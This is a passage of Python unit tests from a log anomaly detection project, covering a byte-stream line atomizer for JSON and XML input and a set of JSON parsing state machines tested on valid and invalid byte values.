self.reset_output_stream() self.assertEqual(bsla.consume_data(json2, False), len(json2)) self.assertEqual(self.output_stream.getvalue(), "") bsla = ByteStreamLineAtomizer(fdme, [], [self.stream_printer_event_handler], 100, [], json_format=True) self.assertEqual(bsla.consume_data(json2, True), len(json2)) self.assertEqual(self.output_stream.getvalue(), 'Incomplete last line (1 lines)\n {"a": 1,"b": {"c": 2},"d": 3\n\n') self.reset_output_stream() self.assertEqual(bsla.consume_data(json2, False), len(json2.rsplit(b"}", 2)[0]) + 1) self.assertEqual(self.output_stream.getvalue(), "") def test3consume_data_xml(self): """ Test the functionality of the ByteStreamLineAtomizer on xml data. The ByteStreamLineAtomizer is not expected to do anything other than passing the data to the XmlModelElement. """ data = b"ToveJaniDon't forget me this weekend!Don't forget me this weekend!" \ b"JaniToveRe: I will notI will not" output = ("New path(s) detected\nNewMatchPathDetector: \"None\" (1 lines)\n ['/xml', '/xml/messages/note/+id/id', '/xml/messages/note/to/to', '/xml/messages/note/from/from', " "'/xml/messages/note/body/text1/text1', '/xml/messages/note/body/text2/text2', '/xml/messages/note/+id/id/0', '/xml/messages/note/to/to/0', '/xml/messages/note/from/from/0'," " '/xml/messages/note/?heading', '/xml/messages/note/body/text1/text1/0', '/xml/messages/note/body/text2/text2/0', '/xml/messages/note/+id/id/1', '/xml/messages/note/_+opt/opt'," " '/xml/messages/note/to/to/1', '/xml/messages/note/from/from/1', '/xml/messages/note/?heading/heading', '/xml/messages/note/body/text1/text1/1', '/xml/messages/note/body/text2/text2/1']\n\n") key_parser_dict = {"messages": [{"note": { "+id": DummyNumberModelElement("id"), "_+opt": DummyFixedDataModelElement("opt", b"text"), "to": AnyByteDataModelElement("to"), "from": AnyByteDataModelElement("from"), "?heading": AnyByteDataModelElement("heading"), "body": { "text1": AnyByteDataModelElement("text1"), "text2": AnyByteDataModelElement("text2") } 
}}]} xmlme = XmlModelElement("xml", key_parser_dict) nmpd = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=False, output_logline=False) atom_filter = AtomFilters.SubhandlerFilter(None) simple_unparsed_atom_handler = SimpleUnparsedAtomHandler([self.stream_printer_event_handler]) atom_filter.add_handler(simple_unparsed_atom_handler, stop_when_handled_flag=True) atom_filter.add_handler(nmpd) bsla = ByteStreamLineAtomizer(xmlme, [atom_filter], [self.stream_printer_event_handler], 65536, [], xml_format=True) self.assertEqual(bsla.consume_data(data, False), len(data)) self.assertEqual(self.output_stream.getvalue(), output) def test4validate_parameters(self): """Test all initialization parameters for the atomizer. Input parameters must be validated in the class.""" data = b"fixed data" fdme = DummyFixedDataModelElement("fixed", data) self.assertRaises(TypeError, ByteStreamLineAtomizer, "default", [], [self.stream_printer_event_handler], 100, []) self.assertRaises(TypeError, ByteStreamLineAtomizer, b"Default", [], [self.stream_printer_event_handler], 100, []) self.assertRaises(TypeError, ByteStreamLineAtomizer, None, [], [self.stream_printer_event_handler], 100, []) self.assertRaises(TypeError, ByteStreamLineAtomizer, True, [], [self.stream_printer_event_handler], 100, []) self.assertRaises(TypeError, ByteStreamLineAtomizer, 123, [], [self.stream_printer_event_handler], 100, []) self.assertRaises(TypeError, ByteStreamLineAtomizer, 123.3, [], [self.stream_printer_event_handler], 100, []) self.assertRaises(TypeError, ByteStreamLineAtomizer, ["default"], [], [self.stream_printer_event_handler], 100, []) self.assertRaises(TypeError, ByteStreamLineAtomizer, {"id": "Default"}, [], [self.stream_printer_event_handler], 100, []) self.assertRaises(TypeError, ByteStreamLineAtomizer, (), [], [self.stream_printer_event_handler], 100, []) self.assertRaises(TypeError, ByteStreamLineAtomizer, set(), [], [self.stream_printer_event_handler], 100, 
[]) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, "default", [self.stream_printer_event_handler], 100, []) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, b"Default", [self.stream_printer_event_handler], 100, []) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, True, [self.stream_printer_event_handler], 100, []) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, 123, [self.stream_printer_event_handler], 100, []) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, 123.3, [self.stream_printer_event_handler], 100, []) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, ["default"], [self.stream_printer_event_handler], 100, []) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, {"id": "Default"}, [self.stream_printer_event_handler], 100, []) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, (), [self.stream_printer_event_handler], 100, []) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, set(), [self.stream_printer_event_handler], 100, []) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], "default", 100, []) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], b"Default", 100, []) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], None, 100, []) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], True, 100, []) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], 123, 100, []) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], 123.3, 100, []) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], ["default"], 100, []) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], {"id": "Default"}, 100, []) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], (), 100, []) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], set(), 100, []) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], "default", []) self.assertRaises(TypeError, 
ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], b"Default", []) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], None, []) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], True, []) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 123.3, []) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], ["default"], []) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], {"id": "Default"}, []) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], (), []) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], set(), []) self.assertRaises(ValueError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 0, []) self.assertRaises(ValueError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], -1, []) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, "default") self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, b"Default") self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, None) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, True) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, 123) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, 123.3) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [b"default"]) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, 
{"id": "Default"}) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, ()) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, set()) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], eol_sep="default") self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], eol_sep=None) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], eol_sep=True) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], eol_sep=123) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], eol_sep=123.3) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], eol_sep=[b"default"]) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], eol_sep={"id": "Default"}) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], eol_sep=()) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], eol_sep=set()) self.assertRaises(ValueError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], eol_sep=b"") self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], json_format="default") self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], json_format=b"Default") self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], json_format=None) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], 
json_format=123) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], json_format=123.3) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], json_format=[b"default"]) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], json_format={"id": "Default"}) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], json_format=()) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], json_format=set()) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], xml_format="default") self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], xml_format=b"Default") self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], xml_format=None) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], xml_format=123) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], xml_format=123.3) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], xml_format=[b"default"]) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], xml_format={"id": "Default"}) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], xml_format=()) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], xml_format=set()) self.assertRaises(ValueError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], json_format=True, xml_format=True) 
self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], use_real_time="default") self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], use_real_time=b"Default") self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], use_real_time=None) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], use_real_time=123) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], use_real_time=123.3) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], use_real_time=[b"default"]) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], use_real_time={"id": "Default"}) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], use_real_time=()) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], use_real_time=set()) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], resource_name=True) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], resource_name=123) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], resource_name=123.3) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], resource_name=[b"default"]) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], resource_name={"id": "Default"}) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], resource_name=()) 
self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], resource_name=set()) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], continuous_timestamp_missing_warning="default") self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], continuous_timestamp_missing_warning=b"Default") self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], continuous_timestamp_missing_warning=None) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], continuous_timestamp_missing_warning=123) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], continuous_timestamp_missing_warning=123.3) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], continuous_timestamp_missing_warning=[b"default"]) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], continuous_timestamp_missing_warning={"id": "Default"}) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], continuous_timestamp_missing_warning=()) self.assertRaises(TypeError, ByteStreamLineAtomizer, fdme, [], [self.stream_printer_event_handler], 100, [], continuous_timestamp_missing_warning=set()) ByteStreamLineAtomizer(fdme, [], [], 65536, ["path"], resource_name="test1") ByteStreamLineAtomizer(fdme, None, [], 65536, [], resource_name=b"test1") if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/input/JsonStateMachineTest.py000066400000000000000000000667621500476301700275510ustar00rootroot00000000000000import unittest from aminer.input.JsonStateMachine import json_machine, constant_machine, string_machine, 
utf8_machine, hex_machine, number_machine,\ array_machine, object_machine from unit.TestBase import TestBase class ByteStreamLineAtomizerTest(TestBase): """Unittests for the JsonStateMachine.""" def test1hex_machine_valid_values(self): """Test the hex_machine with all valid four digit values from 0x0000 to 0xFFFF.""" def check_value(data): self.assertEqual(data, i) for i in range(65536): string = str(format(i, '#06x')).encode()[2:] # remove 0x state = hex_machine(check_value) for c in string: state = state(c) self.assertIsNone(state) for i in range(65536): string = str(format(i, '#06x')).upper().encode()[2:] # remove 0x state = hex_machine(check_value) for c in string: state = state(c) self.assertIsNone(state) def test2hex_machine_too_short_value(self): """Test the hex_machine with too short hex values.""" def check_value(data): self.assertEqual(data, i) for i in range(4096): # converts the integer to the shortest possible hex string. string = str(hex(i)).encode()[2:] # remove 0x state = hex_machine(check_value) for c in string: state = state(c) i = 4096 string = str(hex(i)).encode()[2:] # remove 0x state = hex_machine(check_value) for c in string: state = state(c) self.assertIsNone(state) def test3hex_machine_too_long_value(self): """Test the hex_machine with too long hex values. All values longer than 4 digits are stripped.""" def check_value(data): self.assertEqual(data, i) # only 00FF is read. i = 255 string = b'0x00FFFF'[2:] # remove 0x state = hex_machine(check_value) j = 0 for j, c in enumerate(string): state = state(c) if state is None: break self.assertEqual(j, 3) self.assertIsNone(state) # only 0F12 is read. 
i = 3858 string = b'0x0F1234'[2:] # remove 0x state = hex_machine(check_value) j = 0 for j, c in enumerate(string): state = state(c) if state is None: break self.assertEqual(j, 3) self.assertIsNone(state) def test4hex_machine_boundary_values(self): """Test boundary values before and after 0-9, a-f, A-F.""" def check_value(data): self.assertEqual(data, i) allowed_value_list = '0123456789abcdefABCDEF' forbidden_value_list = [int(hex(j), 16) for j in range(48)] + [int(hex(j), 16) for j in range(58, 65)] + [ int(hex(j), 16) for j in range(71, 97)] + [int(hex(j), 16) for j in range(103, 128)] for a in allowed_value_list: state = hex_machine(check_value) string = '0x'+a+a+a+a i = int(string, 16) # convert hex string to integer for _ in range(4): state = state(ord(a)) self.assertEqual(state, None) for f in forbidden_value_list: state = hex_machine(check_value) self.assertIsNone(state(f), "value: %d, char: '%s' should not be allowed in the hex_machine!" % (f, chr(f))) def test5hex_machine_started_from_string_machine(self): """Test if the hex_machine is started from the string_machine.""" def check_value(_data): pass string = b"\u02FF" state = string_machine(check_value) hex_machine_found = False for c in string: state = state(c) if state.__name__ == '_hex': hex_machine_found = True self.assertIsNone(state(ord(b'"'))) self.assertTrue(hex_machine_found) string = b"\uff02" state = string_machine(check_value) hex_machine_found = False for c in string: state = state(c) if state.__name__ == '_hex': hex_machine_found = True self.assertIsNone(state(ord(b'"'))) self.assertTrue(hex_machine_found) def test6utf8_machine_allowed_2_byte_values(self): """ Test all allowed values for the utf8_machine with 2 byte values. Only every 4th value is checked to save time. This can be changed by changing the step variable. When checking every 4th value the boundary values are also checked. 
""" def check_value_hex2(data): self.assertEqual(data, (i - 194)*64 + j) step = 4 for i in range(192, 224): for j in range(128, 192, step): state = utf8_machine(i, check_value_hex2) state = state(j) # check if the state is None only once to save time. self.assertIsNone(state) def test7utf8_machine_forbidden_2_byte_boundary_values(self): """Test all boundary values for 2 byte utf8 values.""" def raise_error(_): raise Exception("Valid UTF-8 value found in boundary test!") self.assertIsNone(utf8_machine(191, raise_error)) self.assertIsNone(utf8_machine(192, raise_error)(127)) self.assertIsNone(utf8_machine(192, raise_error)(192)) self.assertRaises(Exception, utf8_machine(192, raise_error), 128) self.assertRaises(Exception, utf8_machine(192, raise_error), 191) def test8utf8_machine_allowed_3_byte_values(self): """ Test all allowed values for the utf8_machine with 3 byte values. Only every 4th value is checked to save time. This can be changed by changing the step variable. When checking every 4th value the boundary values are also checked. """ def check_value_hex3(data): self.assertEqual(data, (i - 224)*64*64 + (j - 128)*64 + k - 128) step = 4 for i in range(224, 240): for j in range(128, 192, step): for k in range(128, 192): state = utf8_machine(i, check_value_hex3) state = state(j) state = state(k) # check if the state is None only once to save time. 
self.assertIsNone(state) def test9utf8_machine_forbidden_3_byte_boundary_values(self): """Test all boundary values for 3 byte utf8 values.""" def raise_error(_): raise Exception("Valid UTF-8 value found in boundary test!") self.assertIsNone(utf8_machine(224, raise_error)(127)) self.assertIsNone(utf8_machine(224, raise_error)(192)) self.assertIsNone(utf8_machine(224, raise_error)(128)(127)) self.assertIsNone(utf8_machine(224, raise_error)(191)(192)) self.assertRaises(Exception, utf8_machine(224, raise_error)(128), 128) self.assertRaises(Exception, utf8_machine(224, raise_error)(191), 191) def test10utf8_machine_allowed_4_byte_values(self): """ Test all allowed values for the utf8_machine with 4 byte values. Only every 4th value is checked to save time. This can be changed by changing the step variable. When checking every 4th value the boundary values are also checked. """ def check_value_hex4(data): self.assertEqual(data, (i - 240)*64*64*64 + (j - 128)*64*64 + (k - 128)*64 + m - 128) step = 4 for i in range(240, 248): for j in range(128, 192, step): for k in range(128, 192, step): for m in range(128, 192, step): state = utf8_machine(i, check_value_hex4) state = state(j) state = state(k) state = state(m) # check if the state is None only once to save time. 
self.assertIsNone(state) def test11utf8_machine_forbidden_3_byte_boundary_values(self): """Test all boundary values for 4 byte utf8 values.""" def raise_error(_): raise Exception("Valid UTF-8 value found in boundary test!") self.assertIsNone(utf8_machine(240, raise_error)(127)) self.assertIsNone(utf8_machine(240, raise_error)(192)) self.assertIsNone(utf8_machine(240, raise_error)(128)(127)) self.assertIsNone(utf8_machine(240, raise_error)(191)(192)) self.assertIsNone(utf8_machine(240, raise_error)(128)(128)(127)) self.assertIsNone(utf8_machine(240, raise_error)(191)(191)(192)) self.assertRaises(Exception, utf8_machine(240, raise_error)(128)(128), 128) self.assertRaises(Exception, utf8_machine(240, raise_error)(191)(191), 191) def test12utf8_machine_started_from_string_machine(self): """Test if the utf8_machine is started from the string_machine.""" def check_value(_data): pass string = b"File pattern: file\x5f.txt" state = string_machine(check_value) utf8_machine_found = False for c in string: state = state(c) if state.__name__ == '_utf8': utf8_machine_found = True self.assertIsNone(state(ord(b'"'))) self.assertFalse(utf8_machine_found) string = b"It is 20\xc2\xb0C" state = string_machine(check_value) utf8_machine_found = False for c in string: state = state(c) if state.__name__ == '_utf8': utf8_machine_found = True self.assertIsNone(state(ord(b'"'))) self.assertTrue(utf8_machine_found) string = b"This is a foreign letter: \xe0\xa0\xab" state = string_machine(check_value) utf8_machine_found = False for c in string: state = state(c) if state.__name__ == '_utf8': utf8_machine_found = True self.assertIsNone(state(ord(b'"'))) self.assertTrue(utf8_machine_found) string = b"This is an egyptian hieroglyph: \xf0\x93\x80\x90" state = string_machine(check_value) utf8_machine_found = False for c in string: state = state(c) if state.__name__ == '_utf8': utf8_machine_found = True self.assertIsNone(state(ord(b'"'))) self.assertTrue(utf8_machine_found) def 
test13string_machine_valid_values(self): """Test the string_machine with all valid characters.""" def check_value(data): self.assertEqual(data, allowed_chars) allowed_chars = "\n" for c in range(0x20, 0x80): if c in (0x22, 0x5c): # skip "\ continue allowed_chars += chr(c) state = string_machine(check_value) for c in allowed_chars.encode(): state = state(c) self.assertEqual(state.__name__, "_string") state = state(ord('"')) self.assertIsNone(state) def test14string_machine_invalid_values(self): """Test the string_machine with some invalid values.""" def raise_error(_): raise Exception("Invalid returned as valid.") for c in range(0x20): # ascii control characters if c == 0xa: continue state = string_machine(raise_error) self.assertIsNone(state(c)) for c in range(0x80, 0xc0): # some characters after the ascii table state = string_machine(raise_error) self.assertIsNone(state(c)) def test15string_machine_escaped_strings(self): """Test all allowed escape strings in the string_machine.""" def check_value(data): self.assertEqual(data, compare_strings) escape_strings = b"bf\"\\/" compare_strings = "\b\f\"\\/" state = string_machine(check_value) for c in escape_strings: state = state(0x5c) # \ state = state(c) state = state(0x22) # " self.assertIsNone(state) def test16constant_machine_valid_values(self): """Test all allowed values for the constant_machine. 
The first letter was already handled by the json_machine.""" def check_value(data): self.assertEqual(data, value) TRUE = [0x72, 0x75, 0x65] FALSE = [0x61, 0x6c, 0x73, 0x65] NULL = [0x75, 0x6c, 0x6c] value = True state = constant_machine(TRUE, True, check_value) for t in TRUE: state = state(t) self.assertIsNone(state) value = False state = constant_machine(FALSE, False, check_value) for f in FALSE: state = state(f) self.assertIsNone(state) value = None state = constant_machine(NULL, None, check_value) for n in NULL: state = state(n) self.assertIsNone(state) def test17constant_machine_invalid_values(self): """Test if constant_machine fails. The first letter was already handled by the json_machine.""" def raise_error(_): raise Exception("Invalid returned as valid.") TRUE = [0x72, 0x75, 0x65] TRUE_UPPER = [0x52, 0x55, 0x45] FALSE = [0x61, 0x6c, 0x73, 0x65] FALSE_UPPER = [0x41, 0x4c, 0x53, 0x45] NULL = [0x75, 0x6c, 0x6c] NULL_UPPER = [0x55, 0x4c, 0x4c] NONE = [0x6f, 0x6e, 0x65] state = constant_machine(TRUE, True, raise_error) self.assertIsNone(state(TRUE_UPPER[0])) state = constant_machine(FALSE, False, raise_error) self.assertIsNone(state(FALSE_UPPER[0])) state = constant_machine(NULL, None, raise_error) self.assertIsNone(state(NULL_UPPER[0])) state = constant_machine(NULL, None, raise_error) self.assertIsNone(state(NONE[0])) def test18constant_machine_started_from_json_machine(self): """Test if the constant_machine is started from the json_machine. 
Due to changes in the json_machine all values must be objects.""" def check_value(data): self.assertEqual(data, {'var': value}) OBJECT_PREFIX = [0x7b, 0x22, 0x76, 0x61, 0x72, 0x22, 0x3a, 0x20] # {"var": TRUE = [0x74, 0x72, 0x75, 0x65] FALSE = [0x66, 0x61, 0x6c, 0x73, 0x65] NULL = [0x6e, 0x75, 0x6c, 0x6c] value = True state = json_machine(check_value) for t in OBJECT_PREFIX + TRUE: state = state(t) self.assertEqual(state(ord('}')).__name__, '_value') value = False state = json_machine(check_value) for f in OBJECT_PREFIX + FALSE: state = state(f) self.assertEqual(state(ord('}')).__name__, '_value') value = None state = json_machine(check_value) for n in OBJECT_PREFIX + NULL: state = state(n) self.assertEqual(state(ord('}')).__name__, '_value') def check_number_machine(self, check_int_value, value, end_sign): state = number_machine(value[0], check_int_value) for c in value[1:]: state = state(c) self.assertIsNone(state(end_sign)) def test19number_machine_valid_values(self): """Test valid values in the number_machine.""" def check_int_value(data, byte_data): self.assertEqual(data, int(value)) self.assertEqual(end_sign, byte_data) def check_float_value(data, byte_data): self.assertEqual(round(data, 10), float(value)) self.assertEqual(end_sign, byte_data) end_sign = ord(',') value = b'222' self.check_number_machine(check_int_value, value, end_sign) value = b'9223372036854775808' # maxsize 2^64 self.check_number_machine(check_int_value, value, end_sign) value = b'-222' self.check_number_machine(check_int_value, value, end_sign) value = b'+222' self.check_number_machine(check_int_value, value, end_sign) value = b'21.50' self.check_number_machine(check_float_value, value, end_sign) value = b'21.05' self.check_number_machine(check_float_value, value, end_sign) value = b'-21.05' self.check_number_machine(check_float_value, value, end_sign) value = b'1.56E-5' self.check_number_machine(check_float_value, value, end_sign) value = b'1.56e-5' 
self.check_number_machine(check_float_value, value, end_sign) def test20number_machine_end_signs(self): """Check if all non numerical signs end the number_machine.""" def check_int_value(data, byte_data): self.assertEqual(data, int(value)) self.assertEqual(end_sign, byte_data) value = b'222' end_signs = list(range(0x2e)) + list(range(0x3a, 0x45)) + list(range(0x46, 0x65)) + list(range(0x66, 0x80)) valid_signs = [0x2e, 0x45, 0x65] + list(range(0x30, 0x39)) for end_sign in end_signs: state = number_machine(value[0], check_int_value) for c in value[1:]: state = state(c) self.assertIsNone(state(end_sign)) for end_sign in valid_signs: state = number_machine(value[0], check_int_value) for c in value[1:]: state = state(c) self.assertIsNotNone(state(end_sign)) def test21number_machine_invalid_values(self): """Test invalid values in the number_machine.""" def raise_error(_data, _byte_data): raise Exception("Invalid number treated as valid!") value = b'- 222' state = number_machine(value[0], raise_error) self.assertIsNone(state(value[1])) # octal number value = b'0222' self.assertIsNone(number_machine(value[0], raise_error)(value[1])) # negative octal number value = b'-0222' self.assertIsNone(number_machine(value[0], raise_error)(value[1])(value[2])) # hex number value = b'0x80' self.assertIsNone(number_machine(value[0], raise_error)(value[1])) value = b'NaN' self.assertIsNone(number_machine(value[0], raise_error)) value = b'Infinity' self.assertIsNone(number_machine(value[0], raise_error)) value = b'.1' self.assertIsNone(number_machine(value[0], raise_error)) def check_number_machine_from_json_machine(self, check_int_value, value, end_sign): state = json_machine(check_int_value) for c in value: state = state(c) self.assertEqual(state(end_sign).__name__, '_value') def test22number_machine_started_from_json_machine(self): """Test if the number_machine is started from the json_machine.""" def check_int_value(data): self.assertEqual(data, {'value': int(value)}) def 
check_float_value(data): data['value'] = round(data['value'], 10) self.assertEqual(data, {'value': float(value)}) end_sign = ord('}') object_prefix = b'{"value": ' value = b'222' self.check_number_machine_from_json_machine(check_int_value, object_prefix+value, end_sign) value = b'9223372036854775808' # maxsize 2^64 self.check_number_machine_from_json_machine(check_int_value, object_prefix+value, end_sign) value = b'-222' self.check_number_machine_from_json_machine(check_int_value, object_prefix+value, end_sign) value = b'+222' self.check_number_machine_from_json_machine(check_int_value, object_prefix+value, end_sign) value = b'0' self.check_number_machine_from_json_machine(check_float_value, object_prefix+value, end_sign) value = b'21.50' self.check_number_machine_from_json_machine(check_float_value, object_prefix+value, end_sign) value = b'21.05' self.check_number_machine_from_json_machine(check_float_value, object_prefix+value, end_sign) value = b'-21.05' self.check_number_machine_from_json_machine(check_float_value, object_prefix+value, end_sign) value = b'0.56' self.check_number_machine_from_json_machine(check_float_value, object_prefix+value, end_sign) value = b'1.56E-5' self.check_number_machine_from_json_machine(check_float_value, object_prefix+value, end_sign) value = b'1.56e-5' self.check_number_machine_from_json_machine(check_float_value, object_prefix+value, end_sign) value = b'1.56e+5' self.check_number_machine_from_json_machine(check_float_value, object_prefix+value, end_sign) value = b'0.56e+5' self.check_number_machine_from_json_machine(check_float_value, object_prefix+value, end_sign) def test23array_machine_valid_array(self): """Test possible valid arrays.""" def check_value(data): self.assertEqual(data, compare_value) value = b'"string", 22, 22.50, true, false, null]' compare_value = ['string', 22, 22.5, True, False, None] state = array_machine(check_value) for c in value: state = state(c) self.assertIsNone(state) value = 
b'\n\t\t"string",\n\t\t22,\n\t\t22.50,\n\t\ttrue,\n\t\tfalse,\n\t\tnull]'
        state = array_machine(check_value)
        for c in value:
            state = state(c)
        # a fully consumed array hands back no further state
        self.assertIsNone(state)

        # array whose elements are objects
        value = b'{"value": 22}, {"value": "string"}]'
        compare_value = [{'value': 22}, {'value': 'string'}]
        state = array_machine(check_value)
        for c in value:
            state = state(c)
        self.assertIsNone(state)

    def test24array_machine_invalid_formats(self):
        """Test the array_machine with invalid formats.

        The callback raises instead of comparing, so the test fails if malformed input is ever reported as a valid value.
        Each input is fed only up to and including the first offending byte; by then the returned state must be None.
        """
        def raise_error(_):
            raise Exception("Invalid returned as valid.")

        # no comma between "string" and 22
        value = b'"string" 22, 22.50, true, false, null]'
        state = array_machine(raise_error)
        for c in value[:value.index(b'2') + 1]:
            state = state(c)
        self.assertIsNone(state)

